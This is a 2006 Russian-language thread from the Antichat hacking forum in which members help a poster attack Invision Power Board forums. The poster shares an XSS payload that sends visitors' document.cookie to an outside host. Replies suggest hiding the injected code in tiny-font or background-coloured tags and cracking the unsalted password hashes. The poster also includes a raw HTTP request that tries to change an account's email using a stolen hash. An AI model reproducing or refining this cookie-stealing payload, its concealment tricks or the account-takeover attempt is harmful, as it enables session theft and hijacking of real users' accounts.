ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Powered by Invision Power Board(U) © 2003 IPS, Inc.
  #1  
Старый 12.11.2006, 04:47
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию Powered by Invision Power Board(U) © 2003 IPS, Inc.

Возможно эта тема уже изезжена на у меня несколько вопросов и прозьб в помощи советом
1 при попытк вставить XSS : [em**com`=`][/url].com[/email] ` style=`background:url(javas*cript:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+documen*t.cookie);`

В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?

2: при подстановки скрипта в качестве аватара комне неприходят куки а просто приходят логи с какого IP адреса заходили и всё
Плиз прошу помощи
 
Ответить с цитированием

  #2  
Старый 12.11.2006, 05:00
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию

Ну...звездочки вообщето убирать надо
 
Ответить с цитированием

  #3  
Старый 12.11.2006, 05:08
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию

звёздочки я здесь вставил а на форуме на котором тестировалось писал без звёздочек
 
Ответить с цитированием

  #4  
Старый 12.11.2006, 05:13
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию

так же при отсылание этого скрипта в пм он работает на только в ИЕ в опере он палится блин а куки хочется темболее хеш на данной версии форума можно расифровать ведь он без соли
 
Ответить с цитированием

  #5  
Старый 12.11.2006, 05:18
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

ЗАЮЗАЙ inetcrack
 
Ответить с цитированием

  #6  
Старый 15.11.2006, 01:16
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию

И как эти дырки можно заделать неподскажите ?
и можно ли как небуть сменить мыло незная параля но зная хеш?
 
Ответить с цитированием

  #7  
Старый 15.11.2006, 01:34
africanec
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567

Репутация: -12
Отправить сообщение для africanec с помощью ICQ
По умолчанию

2Дворник нет.
п.с. если нестоит что без проверки пасса меняетса что очень врятли
 
Ответить с цитированием

  #8  
Старый 15.11.2006, 01:52
dv0rnik
Новичок
Регистрация: 10.11.2006
Сообщений: 9
Провел на форуме:
50847

Репутация: 2
По умолчанию

Проверка паса стоит но я пытался поменять при помощи http заголовка отправить:

POST /forums/index.php? HTTP/1.0
User-Agent: Opera/9.02 (Windows NT 5.1; U; ru)
Host: site.net
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://site.net/forums/index.php?act=UserCP&CODE=08
Cookie: forum_read=a%3A1%3A%7Bi%3A15%3Bi%3A1163
497321%3B%7D; anonlogin=-1; member_id=1061; pass_hash=5f3249aa304055d63828af3bfab778f6; session_id=92af66c5aa31faf222e6a87af24e004a
Cookie2: $Version=1
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

act=UserCP&CODE=09&in_email_1=qwe%40rt.er&in
_email_2=qwe%40rt.er&password=123&regid=c04
06f65bd1257ba6ab5d8c79d780650&reg_code=
143102&change_email=%D1%EE%F5%F0%E0%ED
%E8%F2%FC+%E8%E7%EC%E5%ED%E5%ED%E8%FF

думал вместо password=123 вставить известный мне хеш , непрокатило извиняюсь за ламерство но попытка....
 
Ответить с цитированием

  #9  
Старый 15.11.2006, 10:21
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Цитата:
Сообщение от dv0rnik  

В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?
вставь всё это дело в тэги
PHP код:
[SIZE=-7][/SIZE
или как вариант в тэг color с цветом фона форума

Последний раз редактировалось злюка; 15.11.2006 в 10:24..
 
Ответить с цитированием

  #10  
Старый 15.11.2006, 20:37
JIaMo
Новичок
Регистрация: 24.09.2006
Сообщений: 10
Провел на форуме:
44609

Репутация: 1
Отправить сообщение для JIaMo с помощью ICQ
По умолчанию

Цитата:
Сообщение от dv0rnik  
Возможно эта тема уже изезжена на у меня несколько вопросов и прозьб в помощи советом
1 при попытк вставить XSS : [em**com`=`][/url].com[/email] ` style=`background:url(javas*cript:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+documen*t.cookie);`

В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?
Такое работает только в ие, в опере работать небудет
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Invision Power Board(U) v1.3 Final © 2003 IPS, Inc. КИНГ Форумы 17 23.06.2006 15:38
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final 0verfe1 Форумы 7 07.01.2006 03:23
Powered by Invision Power Board(U) v1.2 RC 2 © 2003 IPS, Inc. chip Болталка 5 05.04.2005 23:04
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
SQL запрос в Powered by Invision Power Board(U) v1.3 Майор Форумы 4 17.01.2005 01:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ